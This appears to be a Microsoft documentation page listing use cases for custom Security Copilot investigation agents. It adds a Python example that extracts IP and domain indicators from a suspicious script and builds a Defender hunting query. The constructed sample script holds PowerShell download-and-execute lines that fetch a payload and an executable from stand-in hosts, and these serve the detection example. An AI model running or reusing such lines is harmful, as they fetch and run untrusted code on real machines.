

Security Copilot Use cases for custom agents

Important

Some information in this article relates to a prerelease product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Microsoft Security Copilot provides advanced automation capabilities to help you tackle real challenges in security and IT operations including Security Copilot promptbooks and Security Copilot agents.

Security Copilot promptbooks can be leveraged to build automations that follow a deterministic and linear workflow.

Security Copilot agents can be leveraged to build automations for deterministic or nondeterministic workflows. In a nondeterministic workflow, the agent uses its tools and instructions to develop a dynamic plan for achieving the requested outcome. Agents also provide added functionality such as the ability to run on a schedule and to learn from user feedback.

You can choose to build promptbooks or agents depending on your security and IT operations scenarios and use cases.

Use cases for custom agents

Custom Security Copilot agents can be developed for any use case. The following are some ideas for agents that enhance security and IT operations:

  1. Agent that performs a comprehensive investigation of Microsoft Defender security incidents by analyzing incident details, extracting entities, and correlating with Microsoft Sentinel incidents for enriched context. It concludes with a detailed verdict analysis that determines if the incident is a true positive, false positive, or requires further investigation, along with recommended follow-up steps.

  2. Agent that analyzes suspicious code snippets or scripts to determine their malicious nature and extracts indicators of compromise (IOCs) such as IP addresses and domains. The agent then gathers threat intelligence on the extracted IOCs and checks if any organizational devices have communicated with these potentially malicious indicators in the past seven days.

  3. Agent that generates comprehensive threat intelligence reports based on user input and searches for associated Common Vulnerabilities and Exposures (CVE) in Microsoft Defender tables. It analyzes threat actors, tools, and vulnerabilities while identifying impacted devices in the environment and providing mitigation strategies.

  4. Agent that conducts comprehensive email investigations by analyzing suspicious emails across Microsoft Entra ID, Defender, Sentinel, and the Microsoft Defender Threat Intelligence platform. It examines email details, sender history, attachment interactions, URL clicks, user sign-in activity, and entity reputations to provide security recommendations and determine compromise indicators.

  5. Agent that performs comprehensive user investigations by collecting and analyzing data from multiple security platforms including Entra ID, Intune, and Microsoft Sentinel. It examines user details, risk levels, audit logs, sign-in patterns, device compliance, IP reputations, and security alerts to produce an executive-level investigative summary.
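To make the second use case concrete, the following added example (not code from this article or from Security Copilot itself) shows the deterministic part of that workflow: refanging a suspicious script, extracting IP and domain indicators, building a Microsoft Defender advanced hunting (KQL) query over `DeviceNetworkEvents` for the past seven days, and applying the same matching logic locally to a constructed set of event rows. The script snippet, event rows, and small TLD allowlist are all constructed for the example; the table and column names (`DeviceNetworkEvents`, `Timestamp`, `DeviceName`, `RemoteIP`, `RemoteUrl`) are the Defender advanced hunting schema, and the threat-intelligence enrichment step the use case describes is not included.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample (not a real threat): a downloader-style snippet with defanged indicators.
SAMPLE_SNIPPET = r"""
$u = "hxxp://update-check[.]example[.]net/payload.ps1"
IEX (New-Object Net.WebClient).DownloadString($u)
$c2 = "203[.]0[.]113[.]45"
Invoke-WebRequest -Uri "http://198.51.100.7:8080/beacon" -OutFile C:\Temp\b.exe
ping 127.0.0.1
"""

# Constructed rows shaped like DeviceNetworkEvents, standing in for a hunting result.
SAMPLE_EVENTS = [
    {"Timestamp": "2025-01-10T09:12:00Z", "DeviceName": "WS-042", "RemoteIP": "203.0.113.45", "RemoteUrl": ""},
    {"Timestamp": "2025-01-11T14:03:00Z", "DeviceName": "SRV-07", "RemoteIP": "192.0.2.9",
     "RemoteUrl": "https://update-check.example.net/x"},
    {"Timestamp": "2025-01-12T08:00:00Z", "DeviceName": "WS-019", "RemoteIP": "8.8.8.8", "RemoteUrl": "https://dns.google"},
]

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_URL_HOST = re.compile(r"https?://([^\s/:'\"]+)", re.IGNORECASE)
_BARE_DOMAIN = re.compile(r"\b((?:[a-z0-9-]+\.)+([a-z]{2,}))\b", re.IGNORECASE)
# Constructed, deliberately small TLD allowlist: keeps tokens like "Net.WebClient" from passing as domains.
_TLDS = {"com", "net", "org", "io", "info", "biz", "xyz", "top", "ru", "cn"}


def refang(text: str) -> str:
    """Undo common defanging so indicators match the form that appears in telemetry."""
    return (text.replace("[.]", ".").replace("(.)", ".")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


@dataclass
class Iocs:
    ips: set = field(default_factory=set)
    domains: set = field(default_factory=set)


def _usable_ip(candidate: str):
    """Return the address as a string if it parses and is not loopback/link-local/multicast/unspecified."""
    try:
        ip = ipaddress.ip_address(candidate)
    except ValueError:
        return None
    if ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified:
        return None
    return str(ip)


def extract_iocs(snippet: str) -> Iocs:
    """Pull IPv4 addresses and domains out of a script after refanging it."""
    text = refang(snippet)
    found = Iocs()
    for candidate in _IPV4.findall(text):
        ip = _usable_ip(candidate)
        if ip:
            found.ips.add(ip)
    hosts = set(_URL_HOST.findall(text))
    hosts |= {m[0] for m in _BARE_DOMAIN.findall(text) if m[1].lower() in _TLDS}
    for host in hosts:
        host = host.lower()
        if _IPV4.fullmatch(host):  # a URL with an IP host was already handled above
            continue
        found.domains.add(host)
    return found


def build_hunting_query(iocs: Iocs, days: int = 7) -> str:
    """Build a Defender advanced hunting (KQL) query over DeviceNetworkEvents for the lookback window."""
    clauses = []
    if iocs.ips:
        clauses.append("RemoteIP in (%s)" % ", ".join(f'"{ip}"' for ip in sorted(iocs.ips)))
    if iocs.domains:
        clauses.append("RemoteUrl has_any (%s)" % ", ".join(f'"{d}"' for d in sorted(iocs.domains)))
    if not clauses:
        raise ValueError("no indicators to hunt for")
    return (
        "DeviceNetworkEvents\n"
        f"| where Timestamp > ago({days}d)\n"
        f"| where {' or '.join(clauses)}\n"
        "| summarize FirstSeen=min(Timestamp), LastSeen=max(Timestamp), Connections=count()"
        " by DeviceName, RemoteIP, RemoteUrl\n"
        "| order by LastSeen desc"
    )


def match_events(iocs: Iocs, events) -> dict:
    """Apply the same IOC logic locally to DeviceNetworkEvents-shaped rows; returns device -> matched indicators."""
    hits = {}
    for ev in events:
        matched = set()
        if ev.get("RemoteIP") in iocs.ips:
            matched.add(ev["RemoteIP"])
        url = (ev.get("RemoteUrl") or "").lower()
        matched |= {d for d in iocs.domains if d in url}  # substring match, like has_any
        if matched:
            hits.setdefault(ev["DeviceName"], set()).update(matched)
    return hits


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_SNIPPET)
    print("IPs:", sorted(iocs.ips), "Domains:", sorted(iocs.domains))
    print(build_hunting_query(iocs))
    print("Devices with contact:", match_events(iocs, SAMPLE_EVENTS))
```

The loopback address in the snippet is dropped by `_usable_ip`, while RFC 1918 and documentation ranges are kept on purpose so that internal pivot addresses still surface in the hunt; the generated query is what an agent would hand to the Defender advanced hunting tool, and `match_events` mirrors its `in`/`has_any` logic so the extraction can be validated offline.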